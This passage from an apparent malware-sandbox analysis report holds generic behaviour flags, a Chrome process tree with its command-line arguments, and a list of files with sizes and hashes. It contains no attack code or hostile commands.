- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff0664cc40,0x7fff0664cc4c,0x7fff0664cc582⤵PID:4848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1796 /prefetch:22⤵PID:1336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:32⤵PID:1352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:82⤵PID:316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3124 /prefetch:12⤵PID:3396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:12⤵PID:3288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4432,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4452 /prefetch:12⤵PID:1604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4572,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:82⤵PID:4148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:82⤵PID:3856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4628,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:82⤵PID:3556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:82⤵PID:4972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:82⤵PID:4692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4464 /prefetch:82⤵PID:4836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5260,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:22⤵PID:2472
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:8
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\93f336c6-cc1f-4975-9442-4f4f5adf5160.tmp
Filesize9KB
MD5fe06141aa017cec866399bba831765ba
SHA159401cd0e513a1536926a13339baf13db3ff5285
SHA256ddc4843fad0670fa2112d2f349f9255b8ee32d621a292ff103874c7fe4a097af
SHA51285a73194885012ed91b47da7b0f608646729b1c68bb77f92acd3269d36480453e36893ff3b6bbc4873210cf22cfbf02826b21ab166fdf877d44d2a0c191cd14c
-
Filesize
649B
MD5ce06def2d54b984e9ce6c7ba08850dfa
SHA1d8f3f19d5466cce79b08e4fd7776493f771d8f2c
SHA256449b6bac726ad34abeff33bb3bb58d7879c2e99b949a497183c59763903da505
SHA512b9adeefea9cad337589db1959d0093ea67358e8c335fcee5bb9efd89e669e9bea9dafe941c047eebe75d91bb0c2d4f7691562171e37bdfe21795fdc3bfa50db9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json
Filesize851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json
Filesize854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
Filesize
1KB
MD56cc14cafaffad0cc6ab98b1c3c932d11
SHA1ebc210658d71eab5e6d204f5e1a000f4f9268145
SHA2565dff3cc1daad06eab035dec3a79e4f09b767e2d458bc6b44d95498ce802ac176
SHA512a06248d8c1c9239769d0e0861ad87c82de77e546756dc189566b35efedfb8e2bf9de816a51eaa96cdf29ec4c2c07fc626fe53593a2491b62e459f03d889f8069
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD535ae2f9d7022163c9d92326aa3da6c44
SHA1a7227a0f686b72bf2c47a4c61bd210f32b21f5d9
SHA2561c4696b765396f7a434dfb618fe0f2576f3398b70c1972077104ab1c95348eef
SHA512c78e84c56ae692cf67a33e66f0e565bc0487feb5e751ba73b8a7af32133e40474ef3de7b57924811c37083c9fe4b1eddf7b73af6aa39ed4943c949861a7bf784
-
Filesize
9KB
MD528a3523344cda9e9638881db3089cc6a
SHA1e17df3b5e308b4b6586b4b41301519b36cd127be
SHA2565bc457bbc391e78c3bc59f215ff9df2359b0b837caa8ca82918a0d0caf3a969b
SHA5123f8c8165cda19e0ca7e69e9f59e71b56599e8667a0e876643ee64e9598d516b999ad2020f37cac22413f6cd6fd98ed5f35e8602e850b30c3856e44657a454686
-
Filesize
9KB
MD56d4af0a2c837454788cb5dfbe226a545
SHA1f8fdcecded67eb99027e6ac1c638ecc8fc73d499
SHA2562d6a5b163c73f5c6b6b4d83fd6f69c052bf54bb2ac9b7ea22d5a8978837caa4b
SHA51263151fc073d52a8ac866657afc026983749f99cb72702c0faedaea0453ec469bb262db0a8fdf9f2cca436a8d1ebf21b6c036c19e7a245e4fae81c57f4534d46a
-
Filesize
9KB
MD5e6c3a6fcf9581172ca9312bcfb07119c
SHA10bea5e8dc6c79f37b6096a5702aa0861cd9a0bdc
SHA256e3f66a72e55972920cf6a531c2252117ad4b9b940a9b2ab91c56108ce63f2e24
SHA512fc79501b9de0a60d1fc19e073221a935daed252c1e0a5e40897576d1bfbf7f45d8216d589a3fbca6064089dbec7dfbfcb3299d86651b9998aedfadb324c8a971
-
Filesize
9KB
MD5521753a651a5b27307664551fd86beab
SHA150b829376d410ab91218c3e9104f89e3413e05e5
SHA256ba145fae8253b6225bcdb05ad9134a695c058e3b187650c6dc41e0d1f8e73d05
SHA51239ff2fde8dc661d1c33c7c05b3a1e4c82055fc046c4975f8644da5f0d2406b96741c505ce5c7092759a3b80af3aaa77c985e2c0e724b8660f52e3d237020857f
-
Filesize
15KB
MD56ee281f35fd96e78ec5b3655c8b0b411
SHA18cc7ee5604fe7df013701c7a3dd0d62801ba3f0b
SHA256d151a03293e347f356fad5e74fd9ab6a4371372e670ff2e3582d97dc809521f3
SHA512a3c7c24e8176504dee37b6a07145d8d4ca1e71cc95361c6b367dcab9af6e4f39fd1ffab404b11c7aeac713b0e66be17ae947b3cbd71b7628fb30383f4f8b94f7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD5e9d2fc7ba82e3bc4fd55af909b450522
SHA171c2a4838c79402dc4e18d76cd8882746bda1777
SHA256eb116bfa9a35cc536d3fc99a42f3d216107df56b91093c4e2575a7d2efc984f7
SHA51215f4dfb1862e321e295510d3937c3437346a855138ae27be1ab964acf8a3d0e1b85e9e26ec01807bec9397b36487506c56d04d40796d919964a72ad744b59a7c
-
Filesize
231KB
MD5a5bf062e347e85b82d12f1c7bf2d870a
SHA11f56716ff18aed72ada9aaeb7444487fba0a5d47
SHA256fafeca3782011ee96b968105f739acb1e423902ca7a0bdc764a39a3227ea35e4
SHA51260bfea0b884050e8217246b1c51b21610483f03eda0962c555fa84806fe790b8f71c3e6575ca67ff44b33798126e07f2acad3d08f59807656e2c0a69c969d087
-
Filesize
231KB
MD5daf69bf01b7a12d9738c5043d36587b8
SHA19906b07b610636e0137a34471acc29bf2b10a4ba
SHA256063843da32edbd4bdd32981317e8dd67fbee71d4fe0ae8a651dbf0542c149e0d
SHA51243b136fdaab0f22f507c4d0b7cdf9c38da4e4a35f77ed09a17710d84905c079e3beb30b5886641cbef6b352a941da8f8194a7dbf65e05e86bbb83ef9fa9ea39c
-
Filesize
2KB
MD588dc70c361a22feac57b031dd9c1f02f
SHA1a9b4732260c2a323750022a73480f229ce25d46d
SHA25643244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA51219c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
711B
MD5558659936250e03cc14b60ebf648aa09
SHA132f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA2562445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA5121632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir3160_1697987465\b4226876-92c3-4901-a352-2f017c5c3ddc.tmp
Filesize150KB
MD514937b985303ecce4196154a24fc369a
SHA1ecfe89e11a8d08ce0c8745ff5735d5edad683730
SHA25671006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff
SHA5121d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c
-
Filesize
76KB
MD50fee09301324f18d3dd2831a03294a68
SHA160a64ce1a45eec70c891ea4e64f7ebf536b1b58f
SHA25665a3e8e51550a616e1804c6dc4002ffb4a70bb7d38edaf50bc582a7f80a41345
SHA512a22439aabceb28e3e568587cca232e02abb7712871e68c2fa3bacdaa8b874113e40e9d584adad79f1bd006cc7c752326358e1d7cdc3412f35cdcab7665b7fe37
-
Filesize
699KB
MD581dd862410af80c9d2717af912778332
SHA18f1df476f58441db5973ccfdc211c8680808ffe1
SHA25660e76eda46185d1d2e9463d15e31d4c87eb03535d368cc3471c55992bc99ad5f
SHA5128dd014b91fb1e2122d2e4da444db78dd551513c500d447bb1e94ceb7f2f8d45223a8a706e2156102f8c8850d2bb02ae6b8ea0c9282abd7baaa2c84130112af15
-
Filesize
2.4MB
MD59729d33f5cc788e9c1930bcc968acffa
SHA168c662875f7b805dd6f246919d406c8d92158073
SHA2563711a334cb3c6e2a92461067f2d7db2946e9b139f1517b214bc929ba42a86aae
SHA512af12beee6da79e5498eb292eb4a122667bf5dcdf840def97a5476adb31e0701a2aa0585b4266547bb4307c3524c7f9733dbf32f2a87c87b33fadb4bb1ecd0c3f
-
Filesize
64KB
MD5441ebfc2dbc56ad77fbb05854e6b73d7
SHA13eb5238cf73ca845a38be0f2e01f254093918e14
SHA256b97733c8926c8186363f74a875b92d7749bb06f2edc94280322d6f5b9af22798
SHA5122b29382dcc57a23f349e96b28f469f8914c768155d17f5eaf70f70e53d7de7b5fdac57612c4c8a916857b6171c290884defa60d289c41b799aafd0122fb21763